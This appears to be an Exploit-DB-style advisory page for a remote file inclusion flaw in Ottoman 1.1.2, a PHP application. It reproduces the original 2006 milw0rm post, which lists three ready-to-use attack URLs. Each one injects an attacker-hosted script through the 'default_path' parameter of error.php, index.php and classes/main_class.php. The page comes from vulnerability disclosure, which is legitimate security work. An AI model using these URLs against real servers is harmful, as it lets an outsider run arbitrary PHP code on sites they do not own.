ottoman_v1_1_2 - Remote File Include Vulnerabilities

vendor:

Ottoman

by:

Kacper (Rahim)

8.8

CVSS

HIGH

Remote File Include

CWE

Product Name: Ottoman

Affected Version From: 1.1.2002

Affected Version To: 1.1.2002

Patch Exists: YES

Related CWE: N/A

CPE: a:ottoman:ottoman

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

ottoman_v1_1_2 – Remote File Include Vulnerabilities

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'default_path' parameter in multiple scripts. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Mitigation:

Input validation should be used to prevent the execution of malicious code.

Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ottoman_v1_1_2 - Remote File Include Vulnerabilities
# Script site: http://prdownloads.sourceforge.net/ottoman/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################

http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-05-31]